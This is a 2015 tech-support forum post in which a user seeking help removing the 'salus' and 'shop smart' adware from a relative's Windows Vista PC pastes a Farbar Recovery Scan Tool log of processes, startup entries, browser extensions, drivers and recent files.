Infected with salus and shop smart


  • This topic is locked
10 replies to this topic

#1 SereneSnake

Posted 12 April 2015 - 09:28 PM

I am attempting to clean up my sister's PC. She has two teenagers and they play flash games, so finding her PC infected isn't exactly a surprise to me. I have cleaned most of the offending programs; however, two are proving most troublesome: salus and shop smart. None of the reputable programs can even see these programs, much less remove them. Internet browsing is a nightmare, as salus creates pop-ups on every page and clicking to close opens new tabs/windows. Shop smart takes up space, is generally annoying, and redirects as well. The only reason I haven't done a reinstall is because this PC uses Vista and doesn't have a disc. Any help would be GREATLY appreciated.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-04-2015
Ran by Angel (administrator) on ANGEL-PC on 12-04-2015 20:57:04
Running from C:\Users\Angel\Downloads
Loaded Profiles: Angel (Available profiles: Angel)
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\AERTSrv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe
(Reimage®) C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\Creativity Suite\Event Manager\EEventManager.exe
(Hewlett-Packard Company) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Hewlett-Packard) C:\Windows\System32\hphmon06.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe
() C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Macrovision Corporation) C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe
(Microsoft Corporation) C:\Program Files\Windows Live\Messenger\msnmsgr.exe
(Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Co.) C:\Program Files\HP\digital imaging\bin\hpqgalry.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [6265376 2008-08-19] (Realtek Semiconductor)
HKLM\...\Run: [IAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [182808 2008-07-20] (Intel Corporation)
HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)
HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM\...\Run: [EEventManager] => C:\Program Files\EPSON\Creativity Suite\Event Manager\EEventManager.exe [102400 2005-04-08] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [HPHUPD06] => C:\Program Files\HP\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}\hphupd06.exe [49152 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [49152 2004-02-12] (Hewlett-Packard Company)
HKLM\...\Run: [HP Component Manager] => C:\Program Files\HP\hpcoretech\hpcmpmgr.exe [241664 2004-05-12] (Hewlett-Packard Company)
HKLM\...\Run: [HPHmon06] => C:\Windows\system32\hphmon06.exe [659456 2004-06-06] (Hewlett-Packard)
HKLM\...\Run: [NPSStartup] => [X]
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-01-20] (Apple Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [978520 2015-01-30] (Microsoft Corporation)
HKLM\...\Run: [SDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-07-08] (Apple Inc.)
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [ISUSPM] => C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe [218032 2006-09-11] (Macrovision Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [AutoStartNPSAgent] => C:\Program Files\SAMSUNG\Samsung New PC Studio\NPSAgent.exe [95576 2010-07-04] (Samsung Electronics Co., Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files\Spybot - Search & Destroy 2\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [5529880 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\WLXPGSS.SCR [307560 2008-12-04] (Microsoft Corporation)
AppInit_DLLs: C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll => C:\PROGRA~1\SearchProtect\SearchProtect\bin\SPVC32Loader.dll File Not Found
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\digital imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Image Zone Fast Start.lnk
ShortcutTarget: HP Image Zone Fast Start.lnk -> C:\Program Files\HP\digital imaging\bin\hpqthb08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Angel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
ProxyServer: [S-1-5-21-1464855766-1936325176-3098395914-1000] => http=127.0.0.1:49172;https=127.0.0.1:49172
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
SearchScopes: HKLM -> DefaultScope {006ee092-9658-4fd6-bd8e-a21a348e59f5} URL = 
SearchScopes: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = 
BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26] (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8050.1202.dll [2008-12-02] (Microsoft Corporation)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_16_0_0_305.dll [2015-02-04] ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2014-02-21] ()
FF Plugin: @java.com/DTPlugin,version=10.5.1 -> C:\Program Files\Oracle\JavaFX 2.1 Runtime\bin\dtplugin\npDeployJava1.dll [2012-05-04] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8051.1204 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2008-12-04] (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-10] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @soe.sony.com/installer,version=1.0.3 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\plugins\npsoe.dll No File
FF Plugin HKU\S-1-5-21-1464855766-1936325176-3098395914-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-10-17] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\user.js [2014-12-24]
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll [2007-04-10] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npCouponPrinter.dll [2008-06-18] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL [2006-10-26] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2014-05-08] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2014-05-29] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPTURNMED.dll [2009-03-11] (CNN)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np_gp.dll [2009-09-23] (NOS Microsystems Ltd.)
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\allrecipes.xml [2009-01-16]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\facebook.xml [2012-11-26]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\imdb.xml [2008-11-05]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\punditkitchennetwork.xml [2009-04-08]
FF SearchPlugin: C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\searchplugins\searchcanvas.xml [2014-08-09]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\aoiuyau@vbgdka.edu [2014-07-29]
FF Extension: FoxSaver - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\foxsaver@www.foxsaver.com [2011-08-29]
FF Extension: Move Media Player - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\moveplayer@movenetworks.com [2009-02-17]
FF Extension: Tab To Window - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\tabtowindow@sogame.cat [2009-06-15]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\yeeyiye@bffm.org [2014-08-09]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-05-01]
FF Extension: IE Tab - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{77b819fa-95ad-4f2c-ac7c-486b356188a9} [2013-06-07]
FF Extension: No Name - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{7b13ec3e-999a-4b70-b9cb-2617b8323822} [2014-07-13]
FF Extension: Personas Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\personas@christopher.beard.xpi [2013-03-03]
FF Extension: Halloween - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{BB359C50-BFC9-4f40-8302-3FE5A499A859}.xpi [2012-05-07]
FF Extension: Adblock Plus - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2012-05-07]
FF Extension: Red Cats (green flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{dd30bf68-268a-4815-ad48-8740b774c764}.xpi [2012-05-07]
FF Extension: Red Cats (blue flavor) - C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\Extensions\{ff356687-aa08-463d-a46c-11c451824939}.xpi [2012-05-07]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-02-16]
StartMenuInternet: FIREFOX.EXE - firefox.exe
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-02]
CHR Extension: (YouTube) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
CHR Extension: (Adblock Plus) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2015-04-02]
CHR Extension: (Google Search) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-16]
CHR Extension: (Google Wallet) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-16]
CHR Extension: (Gmail) - C:\Users\Angel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
CHR HKLM\...\Chrome\Extension: [jmfkcklnlgedgbglfkkgedjfmejoahla] - C:\Program Files\AVG\AVG2012\Chrome\safesearch.crx [Not Found]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AERTFilters; C:\Windows\system32\AERTSrv.exe [81920 2008-08-19] (Andrea Electronics Corporation)
S3 getPlusHelper; C:\Program Files\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22184 2015-01-30] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [284472 2015-01-30] (Microsoft Corporation)
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.exe [65536 2004-03-18] (HP) [File not signed]
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [6079848 2015-01-14] (Reimage®)
R2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
S3 stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [69632 2007-07-11] (MicroVision Development, Inc.) [File not signed]
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-20] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S4 JRAID; C:\Windows\system32\drivers\jraid.sys [79960 2008-08-19] (JMicron Technology Corp.)
R3 KMWDFILTER; C:\Windows\System32\DRIVERS\KMWDFILTER.sys [17408 2008-10-09] (Windows ® Codename Longhorn DDK provider)
R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [239224 2014-11-15] (Microsoft Corporation)
R1 netfilter; C:\Windows\System32\drivers\netfilter.sys [51792 2014-11-19] (NetFilterSDK.com)
R3 pfc; C:\Windows\System32\drivers\pfc.sys [21248 2003-09-19] (Padus, Inc.) [File not signed]
S3 rt70x86; C:\Windows\System32\DRIVERS\netr70.sys [306016 2010-04-27] (Ralink Technology Corp.)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-08-19] (Windows ® Codename Longhorn DDK provider)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13464 2014-07-02] ()
S3 cpuz134; \??\C:\Users\Angel\AppData\Local\Temp\cpuz134\cpuz134_x32.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-04-12 20:57 - 2015-04-12 20:59 - 00021768 _____ () C:\Users\Angel\Downloads\FRST.txt
2015-04-12 20:56 - 2015-04-12 20:56 - 00000000 ____D () C:\Users\Angel\Downloads\FRST-OlderVersion
2015-04-12 20:26 - 2015-04-12 20:54 - 00003364 _____ () C:\Windows\PFRO.log
2015-04-11 23:11 - 2015-04-11 23:11 - 00001891 _____ () C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2015-04-11 23:11 - 2015-04-11 23:11 - 00000000 ____D () C:\ProgramData\Reimage Protector
2015-04-11 23:11 - 2015-04-11 23:11 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
2015-04-11 23:10 - 2015-04-11 23:12 - 00000000 ____D () C:\rei
2015-04-11 23:10 - 2015-04-11 23:11 - 00000000 ____D () C:\Program Files\Reimage
2015-04-11 23:09 - 2015-04-11 23:12 - 00000158 _____ () C:\Windows\Reimage.ini
2015-04-11 23:09 - 2015-04-11 23:09 - 00768512 _____ (Reimage®) C:\Users\Angel\Documents\ReimageRepair.exe
2015-04-11 22:51 - 2015-04-11 22:51 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2015-04-11 22:51 - 2015-04-11 22:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-04-11 22:50 - 2015-04-11 22:50 - 00000000 ____D () C:\Program Files\iPod
2015-04-11 22:49 - 2015-04-11 22:49 - 00000000 ____D () C:\Program Files\Bonjour
2015-04-04 22:22 - 2015-04-04 22:22 - 00000000 ____D () C:\ProgramData\WindowsSearch
2015-04-03 18:19 - 2015-04-12 20:53 - 00272159 _____ () C:\Windows\WindowsUpdate.log
2015-04-03 17:31 - 2015-04-03 17:31 - 00000000 ____D () C:\Windows\pss
2015-04-03 17:17 - 2015-04-12 20:57 - 00000000 ____D () C:\FRST
2015-04-03 17:17 - 2015-04-12 20:56 - 01135616 _____ (Farbar) C:\Users\Angel\Downloads\FRST.exe
2015-04-02 21:41 - 2015-04-02 21:42 - 00010074 _____ () C:\Users\Angel\Downloads\hijackthis.log
2015-04-02 21:40 - 2015-04-02 21:40 - 00388608 _____ (Trend Micro Inc.) C:\Users\Angel\Downloads\HijackThis.exe
2015-04-02 21:32 - 2015-04-02 21:32 - 00000806 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2015-04-02 21:31 - 2015-04-02 21:32 - 00000000 ____D () C:\Program Files\CCleaner
2015-04-02 21:20 - 2015-04-02 21:20 - 05346704 _____ (Piriform Ltd) C:\Users\Angel\Downloads\ccsetup504pro.exe
2015-04-02 19:51 - 2015-01-28 20:35 - 00369664 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2015-04-02 19:50 - 2015-01-28 20:35 - 00975360 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2015-04-02 19:48 - 2015-02-25 19:18 - 02064384 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-04-02 19:40 - 2015-02-19 21:03 - 00034304 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2015-04-02 19:40 - 2015-02-19 19:28 - 00296960 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2015-04-02 19:39 - 2015-02-25 21:01 - 03604408 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2015-04-02 19:39 - 2015-02-25 21:01 - 03552184 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2015-04-02 19:39 - 2015-01-08 21:04 - 00049152 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2015-04-02 19:39 - 2015-01-08 19:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2015-04-02 19:38 - 2015-03-05 23:01 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2015-04-02 19:38 - 2015-01-20 21:02 - 00807936 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2015-04-02 19:37 - 2015-02-17 21:02 - 11587584 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2015-04-02 18:54 - 2015-02-21 12:37 - 12375040 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-04-02 18:54 - 2015-02-21 12:34 - 00367104 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-04-02 18:54 - 2015-02-21 12:29 - 09747968 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-04-02 18:54 - 2015-02-21 12:28 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-04-02 18:54 - 2015-02-21 12:22 - 01139200 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-04-02 18:54 - 2015-02-21 12:21 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-04-02 18:54 - 2015-02-21 12:21 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2015-04-02 18:54 - 2015-02-21 12:20 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 01803264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-04-02 18:54 - 2015-02-21 12:19 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
